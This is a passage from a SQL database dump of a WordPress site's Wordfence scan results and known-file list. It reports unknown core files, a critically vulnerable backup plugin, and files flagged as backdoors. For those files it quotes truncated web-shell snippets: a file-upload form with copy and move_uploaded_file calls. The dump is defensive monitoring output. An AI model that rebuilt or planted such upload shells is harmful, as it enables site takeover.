in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. Learn More (opens in new tab)','a:6:{s:4:\"file\";s:21:\"wp-includes/index.php\";s:8:\"realFile\";s:56:\"/home/tummmyov/tummyrevolution.com/wp-includes/index.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(1148,1704985330,1704985330,'new','knownfile',75,'9897e0a4518fb661da3d245e7dc7b9c4','7885e84bc882561167dc042e66a4745e','Unknown file in WordPress core: wp-admin/php.ini (+ 1 more)','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. 1 more similar file was found. Learn More (opens in new tab)','a:9:{s:4:\"file\";s:16:\"wp-admin/php.ini\";s:8:\"realFile\";s:51:\"/home/tummmyov/tummyrevolution.com/wp-admin/php.ini\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:8:\"coalesce\";s:7:\"php.ini\";s:9:\"learnMore\";s:80:\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\";s:10:\"haveIssues\";s:11:\"coreUnknown\";}'),(1149,1704985559,1704985559,'new','file',100,'be97f270c2873706288925fcf5f7ed9e','fcaeed4e6eeeb61d49b7a9d1a9cd724e','File appears to be malicious or unsafe: wp-content/plugins/backup-backup/includes/2797806595...php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <form method='POST' enctype='multipart/form-data'><input type='file'name='_'/><input type='submit' value='up'/></form>");@copy(

The issue type is: Backdoor:PHP/copy.rce.9363
Description: Code patterns seen with remote code execution, used to take over a site','a:9:{s:4:\"file\";s:58:\"wp-content/plugins/backup-backup/includes/2797806595...php\";s:8:\"realFile\";s:93:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/2797806595...php\";s:4:\"shac\";s:64:\"37662BC998B8BA47BF46FF6A1A2F35FF67015BD5BEB7665800E613C09E3677EF\";s:9:\"highSense\";b:0;s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(1150,1704985559,1704985559,'new','file',100,'4b4656c08df3bed21e28a0b25ce32a27','fcaeed4e6eeeb61d49b7a9d1a9cd724e','File appears to be malicious or unsafe: wp-content/plugins/backup-backup/includes/3688038378...php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <form method='POST' enctype='multipart/form-data'><input type='file'name='_'/><input type='submit' value='up'/></form>");@copy(

The issue type is: Backdoor:PHP/copy.rce.9363
Description: Code patterns seen with remote code execution, used to take over a site','a:9:{s:4:\"file\";s:58:\"wp-content/plugins/backup-backup/includes/3688038378...php\";s:8:\"realFile\";s:93:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/3688038378...php\";s:4:\"shac\";s:64:\"37662BC998B8BA47BF46FF6A1A2F35FF67015BD5BEB7665800E613C09E3677EF\";s:9:\"highSense\";b:0;s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(1151,1704985559,1704985559,'new','file',100,'f921f97d9900b047ea177338c7c6fc03','99032573fc07430909bfb3f29f86f8a9','File appears to be malicious or unsafe: wp-content/plugins/backup-backup/includes/CTY@x7root.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> \\x0d\\x0a</form> </center></td></tr> </table><br>'; \\x0d\\x0aif (!empty ($_FILES['uploads'])) { \\x0d\\x0a move_uploaded_file($...

The issue type is: Suspicious:PHP/uploadform.6890
Description: Compact code to upload files. Can be suspicious','a:9:{s:4:\"file\";s:56:\"wp-content/plugins/backup-backup/includes/CTY@x7root.php\";s:8:\"realFile\";s:91:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/CTY@x7root.php\";s:4:\"shac\";s:64:\"E7C49BFB8486A29AAFF1A7FE7E90EA8A0BFCA391BD0D62C815F8D4A3A5FE194D\";s:9:\"highSense\";b:0;s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(1175,1704989104,1704989104,'new','wfPluginUpgrade',100,'247227371b9a0cd981505be3e6a6450d','247227371b9a0cd981505be3e6a6450d','The Plugin \"Backup Migration\" needs an upgrade (1.3.3 -> 1.4.1).','You need to upgrade \"Backup Migration\" to the newest version to ensure you have any security fixes the developer has released.','a:26:{s:4:\"Name\";s:16:\"Backup Migration\";s:9:\"PluginURI\";s:23:\"https://backupbliss.com\";s:7:\"Version\";s:5:\"1.3.3\";s:11:\"Description\";s:58:\"Most sophisticated backup & migration plugin for WordPress\";s:6:\"Author\";s:7:\"Migrate\";s:9:\"AuthorURI\";s:24:\"https://backupbliss.com/\";s:10:\"TextDomain\";s:13:\"backup-backup\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:16:\"Backup Migration\";s:10:\"AuthorName\";s:7:\"Migrate\";s:10:\"pluginFile\";s:85:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/backup-backup.php\";s:4:\"slug\";s:13:\"backup-backup\";s:10:\"newVersion\";s:5:\"1.4.1\";s:5:\"wpURL\";s:43:\"https://wordpress.org/plugins/backup-backup\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:108:\"https://www.wordfence.com/threat-intel/vulnerabilities/id/3511ba64-56a3-43d7-8ab8-c6e40e3b686e?source=plugin\";s:9:\"cvssScore\";s:3:\"9.8\";s:13:\"severityColor\";s:7:\"#cc0500\";s:13:\"severityLabel\";s:8:\"Critical\";s:13:\"severityClass\";s:34:\"wf-vulnerability-severity-critical\";s:10:\"cvssVector\";s:44:\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\";}'),(1176,1704989104,1704989104,'new','wfPluginUpgrade',50,'4b9fdc43cd513321d9b003307b751061','4b9fdc43cd513321d9b003307b751061','The Plugin \"Copy & Delete Posts\" needs an upgrade (1.4.3 -> 1.4.4).','You need to upgrade \"Copy & Delete Posts\" to the newest version to ensure you have any security fixes the developer has released.','a:20:{s:4:\"Name\";s:19:\"Copy & Delete Posts\";s:9:\"PluginURI\";s:29:\"https://copy-delete-posts.com\";s:7:\"Version\";s:5:\"1.4.3\";s:11:\"Description\";s:93:\"The best solution to easily make duplicates of your posts & pages, and delete them in one go.\";s:6:\"Author\";s:17:\"Copy Delete Posts\";s:9:\"AuthorURI\";s:30:\"https://copy-delete-posts.com/\";s:10:\"TextDomain\";s:17:\"copy-delete-posts\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:19:\"Copy & Delete Posts\";s:10:\"AuthorName\";s:17:\"Copy Delete Posts\";s:10:\"pluginFile\";s:93:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/copy-delete-posts/copy-delete-posts.php\";s:4:\"slug\";s:17:\"copy-delete-posts\";s:10:\"newVersion\";s:5:\"1.4.4\";s:5:\"wpURL\";s:47:\"https://wordpress.org/plugins/copy-delete-posts\";s:15:\"updateAvailable\";b:1;s:10:\"vulnerable\";b:0;}'),(1152,1704985559,1704985559,'new','file',100,'06decfc335ae6810be56a34d7ee6a4ec','99032573fc07430909bfb3f29f86f8a9','File appears to be malicious or unsafe: wp-content/plugins/backup-backup/includes/Mzc@x7root.php','This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> \\x0d\\x0a</form> </center></td></tr> </table><br>'; \\x0d\\x0aif (!empty ($_FILES['uploads'])) { \\x0d\\x0a move_uploaded_file($...

The issue type is: Suspicious:PHP/uploadform.6890
Description: Compact code to upload files. Can be suspicious','a:9:{s:4:\"file\";s:56:\"wp-content/plugins/backup-backup/includes/Mzc@x7root.php\";s:8:\"realFile\";s:91:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/includes/Mzc@x7root.php\";s:4:\"shac\";s:64:\"E7C49BFB8486A29AAFF1A7FE7E90EA8A0BFCA391BD0D62C815F8D4A3A5FE194D\";s:9:\"highSense\";b:0;s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;s:13:\"canRegenerate\";b:0;s:8:\"wpconfig\";b:0;}'),(1142,1704985320,1704985320,'new','knownfile',75,'e25e450ed62862447a6f7ba2e999d861','57a39969be4aacae89ce747b18c28b66','Unknown file in WordPress core: wp-admin/TFWk17JbsY5.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. Learn More (opens in new tab)','a:6:{s:4:\"file\";s:24:\"wp-admin/TFWk17JbsY5.php\";s:8:\"realFile\";s:59:\"/home/tummmyov/tummyrevolution.com/wp-admin/TFWk17JbsY5.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(1143,1704985322,1704985322,'new','knownfile',75,'175b0e4fe8b4a62c59dbd8bde0d27ccf','4be0892c26e0d06fee3bcf2ed5cf4c27','Unknown file in WordPress core: wp-admin/network/theme-insnqkr.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. Learn More (opens in new tab)','a:6:{s:4:\"file\";s:34:\"wp-admin/network/theme-insnqkr.php\";s:8:\"realFile\";s:69:\"/home/tummmyov/tummyrevolution.com/wp-admin/network/theme-insnqkr.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(1144,1704985322,1704985322,'new','knownfile',75,'f9f3c6515d61402069dffbd865d3e4de','305ea2608b0f9539fac99ac6d82d2f36','Unknown file in WordPress core: wp-includes/7BwY2shWSAb.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. Learn More (opens in new tab)','a:6:{s:4:\"file\";s:27:\"wp-includes/7BwY2shWSAb.php\";s:8:\"realFile\";s:62:\"/home/tummmyov/tummyrevolution.com/wp-includes/7BwY2shWSAb.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'); /*!40000 ALTER TABLE `wpvt_wfissues` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wfknownfilelist` -- DROP TABLE IF EXISTS `wpvt_wfknownfilelist`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wfknownfilelist` ( `id` int(11) unsigned NOT NULL AUTO_INCREMENT, `path` text NOT NULL, `wordpress_path` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=16430 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wfknownfilelist` -- LOCK TABLES `wpvt_wfknownfilelist` WRITE; /*!40000 ALTER TABLE `wpvt_wfknownfilelist` DISABLE KEYS */; INSERT INTO `wpvt_wfknownfilelist` (`id`, `path`, `wordpress_path`) VALUES (1,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/.htaccess','wp-content/plugins/akismet/.htaccess'),(2,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/LICENSE.txt','wp-content/plugins/akismet/LICENSE.txt'),(3,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/akismet-admin.css','wp-content/plugins/akismet/_inc/akismet-admin.css'),(4,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/akismet-admin.js','wp-content/plugins/akismet/_inc/akismet-admin.js'),(5,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/akismet-frontend.js','wp-content/plugins/akismet/_inc/akismet-frontend.js'),(6,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/akismet.css','wp-content/plugins/akismet/_inc/akismet.css'),(7,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/akismet.js','wp-content/plugins/akismet/_inc/akismet.js'),(8,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/fonts/inter.css','wp-content/plugins/akismet/_inc/fonts/inter.css'),(9,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/img/akismet-refresh-logo.svg','wp-content/plugins/akismet/_inc/img/akismet-refresh-logo.svg'),(10,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/img/akismet-refresh-logo@2x.png','wp-content/plugins/akismet/_inc/img/akismet-refresh-logo@2x.png'),(11,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/img/arrow-left.svg','wp-content/plugins/akismet/_inc/img/arrow-left.svg'),(12,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/img/logo-a-2x.png','wp-content/plugins/akismet/_inc/img/logo-a-2x.png'),(13,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/img/logo-full-2x.png','wp-content/plugins/akismet/_inc/img/logo-full-2x.png'),(14,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/rtl/akismet-admin-rtl.css','wp-content/plugins/akismet/_inc/rtl/akismet-admin-rtl.css'),(15,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/rtl/akismet-rtl.css','wp-content/plugins/akismet/_inc/rtl/akismet-rtl.css'),(16,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/akismet.php','wp-content/plugins/akismet/akismet.php'),(17,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/changelog.txt','wp-content/plugins/akismet/changelog.txt'),(18,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/class.akismet-admin.php','wp-content/plugins/akismet/class.akismet-admin.php'),(19,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/class.akismet-cli.php','wp-content/plugins/akismet/class.akismet-cli.php'),(20,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/class.akismet-rest-api.php','wp-content/plugins/akismet/class.akismet-rest-api.php'),(21,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/class.akismet-widget.php','wp-content/plugins/akismet/class.akismet-widget.php'),(22,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/class.akismet.php','wp-content/plugins/akismet/class.akismet.php'),(23,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/index.php','wp-content/plugins/akismet/index.php'),(24,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/readme.txt','wp-content/plugins/akismet/readme.txt'),(25,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/activate.php','wp-content/plugins/akismet/views/activate.php'),(26,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/config.php','wp-content/plugins/akismet/views/config.php'),(27,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/connect-jp.php','wp-content/plugins/akismet/views/connect-jp.php'),(28,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/enter.php','wp-content/plugins/akismet/views/enter.php'),(29,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/get.php','wp-content/plugins/akismet/views/get.php'),(30,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/logo.php','wp-content/plugins/akismet/views/logo.php'),(31,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/notice.php','wp-content/plugins/akismet/views/notice.php'),(32,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/predefined.php','wp-content/plugins/akismet/views/predefined.php'),(33,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/setup.php','wp-content/plugins/akismet/views/setup.php'),(34,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/start.php','wp-content/plugins/akismet/views/start.php'),(35,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/stats.php','wp-content/plugins/akismet/views/stats.php'),(36,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/views/title.php','wp-content/plugins/akismet/views/title.php'),(37,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/wrapper.php','wp-content/plugins/akismet/wrapper.php'),(38,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/css/bmi-plugin-icon.min.css','wp-content/plugins/backup-backup/admin/css/bmi-plugin-icon.min.css'),(39,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/css/bmi-plugin.min.css','wp-content/plugins/backup-backup/admin/css/bmi-plugin.min.css'),(40,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/002-monitor-white.svg','wp-content/plugins/backup-backup/admin/images/002-monitor-white.svg'),(41,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/Amazon.svg','wp-content/plugins/backup-backup/admin/images/Amazon.svg'),(42,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/alert_error-min.png','wp-content/plugins/backup-backup/admin/images/alert_error-min.png'),(43,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/alert_info-min.png','wp-content/plugins/backup-backup/admin/images/alert_info-min.png'),(44,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/alert_success-min.png','wp-content/plugins/backup-backup/admin/images/alert_success-min.png'),(45,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/alert_warning-min.png','wp-content/plugins/backup-backup/admin/images/alert_warning-min.png'),(46,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/arrow-min.png','wp-content/plugins/backup-backup/admin/images/arrow-min.png'),(47,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/backblaze.svg','wp-content/plugins/backup-backup/admin/images/backblaze.svg'),(48,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/backup-min.svg','wp-content/plugins/backup-backup/admin/images/backup-min.svg'),(49,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/big-thumb-up.svg','wp-content/plugins/backup-backup/admin/images/big-thumb-up.svg'),(50,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/big_bg_clock_green-min.png','wp-content/plugins/backup-backup/admin/images/big_bg_clock_green-min.png'),(51,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/big_bg_clock_white-min.png','wp-content/plugins/backup-backup/admin/images/big_bg_clock_white-min.png'),(52,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/clock.svg','wp-content/plugins/backup-backup/admin/images/clock.svg'),(53,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/clock2.svg','wp-content/plugins/backup-backup/admin/images/clock2.svg'),(54,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/clocks-min.png','wp-content/plugins/backup-backup/admin/images/clocks-min.png'),(55,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/close-min.png','wp-content/plugins/backup-backup/admin/images/close-min.png'),(56,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/copy-icon.png','wp-content/plugins/backup-backup/admin/images/copy-icon.png'),(57,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/copy-url-stg.svg','wp-content/plugins/backup-backup/admin/images/copy-url-stg.svg'),(58,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/crown-bg.png','wp-content/plugins/backup-backup/admin/images/crown-bg.png'),(59,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/download-min.png','wp-content/plugins/backup-backup/admin/images/download-min.png'),(60,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/dream-objects.svg','wp-content/plugins/backup-backup/admin/images/dream-objects.svg'),(61,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/ftp.svg','wp-content/plugins/backup-backup/admin/images/ftp.svg'),(62,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/google-cloud.svg','wp-content/plugins/backup-backup/admin/images/google-cloud.svg'),(63,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/google-drive-mono.svg','wp-content/plugins/backup-backup/admin/images/google-drive-mono.svg'),(64,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/google-drive.svg','wp-content/plugins/backup-backup/admin/images/google-drive.svg'),(65,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/happy-smile.png','wp-content/plugins/backup-backup/admin/images/happy-smile.png'),(66,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/info-min.png','wp-content/plugins/backup-backup/admin/images/info-min.png'),(67,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/kitty-cat.svg','wp-content/plugins/backup-backup/admin/images/kitty-cat.svg'),(68,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/link-min.png','wp-content/plugins/backup-backup/admin/images/link-min.png'),(69,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/list-ongoing.svg','wp-content/plugins/backup-backup/admin/images/list-ongoing.svg'),(70,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/list-success.svg','wp-content/plugins/backup-backup/admin/images/list-success.svg'),(71,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/list-waiting.svg','wp-content/plugins/backup-backup/admin/images/list-waiting.svg'),(72,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/list-warning.svg','wp-content/plugins/backup-backup/admin/images/list-warning.svg'),(73,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/local-server-2.svg','wp-content/plugins/backup-backup/admin/images/local-server-2.svg'),(74,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/local-server.svg','wp-content/plugins/backup-backup/admin/images/local-server.svg'),(75,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/lock-experimental.png','wp-content/plugins/backup-backup/admin/images/lock-experimental.png'),(76,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/lock-min.svg','wp-content/plugins/backup-backup/admin/images/lock-min.svg'),(77,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/log-in.svg','wp-content/plugins/backup-backup/admin/images/log-in.svg'),(78,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/log-min.svg','wp-content/plugins/backup-backup/admin/images/log-min.svg'),(79,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/logo-min.png','wp-content/plugins/backup-backup/admin/images/logo-min.png'),(80,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/logo.png','wp-content/plugins/backup-backup/admin/images/logo.png'),(81,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/microsoft-azure.svg','wp-content/plugins/backup-backup/admin/images/microsoft-azure.svg'),(82,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/minimize-min.png','wp-content/plugins/backup-backup/admin/images/minimize-min.png'),(83,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/next-icon-min.png','wp-content/plugins/backup-backup/admin/images/next-icon-min.png'),(84,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/nut-big.png','wp-content/plugins/backup-backup/admin/images/nut-big.png'),(85,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/nut-mid.png','wp-content/plugins/backup-backup/admin/images/nut-mid.png'),(86,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/nut-small.png','wp-content/plugins/backup-backup/admin/images/nut-small.png'),(87,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/onedrive.svg','wp-content/plugins/backup-backup/admin/images/onedrive.svg'),(88,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/openstack-swift.svg','wp-content/plugins/backup-backup/admin/images/openstack-swift.svg'),(89,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/pen-edit.svg','wp-content/plugins/backup-backup/admin/images/pen-edit.svg'),(90,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/premium.png','wp-content/plugins/backup-backup/admin/images/premium.png'),(91,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/premium.svg','wp-content/plugins/backup-backup/admin/images/premium.svg'),(92,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/rackspace.svg','wp-content/plugins/backup-backup/admin/images/rackspace.svg'),(93,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/red-close-min.svg','wp-content/plugins/backup-backup/admin/images/red-close-min.svg'),(94,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/red-cross.svg','wp-content/plugins/backup-backup/admin/images/red-cross.svg'),(95,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/restore-icon-min.png','wp-content/plugins/backup-backup/admin/images/restore-icon-min.png'),(96,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/restore-min.svg','wp-content/plugins/backup-backup/admin/images/restore-min.svg'),(97,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/search-min.png','wp-content/plugins/backup-backup/admin/images/search-min.png'),(98,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/sftp-scp.svg','wp-content/plugins/backup-backup/admin/images/sftp-scp.svg'),(99,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/stars.gif','wp-content/plugins/backup-backup/admin/images/stars.gif'),(100,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/stg-bg.svg','wp-content/plugins/backup-backup/admin/images/stg-bg.svg'),(101,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/stg-check.svg','wp-content/plugins/backup-backup/admin/images/stg-check.svg'),(102,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/stg-creation-bg.jpg','wp-content/plugins/backup-backup/admin/images/stg-creation-bg.jpg'),(103,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/stg-new.svg','wp-content/plugins/backup-backup/admin/images/stg-new.svg'),(104,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/stg-restore-btn.svg','wp-content/plugins/backup-backup/admin/images/stg-restore-btn.svg'),(105,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/success.png','wp-content/plugins/backup-backup/admin/images/success.png'),(106,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/support-1.svg','wp-content/plugins/backup-backup/admin/images/support-1.svg'),(107,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/support-2.svg','wp-content/plugins/backup-backup/admin/images/support-2.svg'),(108,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/support-3.svg','wp-content/plugins/backup-backup/admin/images/support-3.svg'),(109,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/thumb.png','wp-content/plugins/backup-backup/admin/images/thumb.png'),(110,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/timemachine.svg','wp-content/plugins/backup-backup/admin/images/timemachine.svg'),(111,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/tlogo.svg','wp-content/plugins/backup-backup/admin/images/tlogo.svg'),(112,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/trash.png','wp-content/plugins/backup-backup/admin/images/trash.png'),(113,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-backup/admin/images/unlocked-min.svg','wp-content/plugins/backup-backup/admin/images/unlocked-min.svg'),(114,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/backup-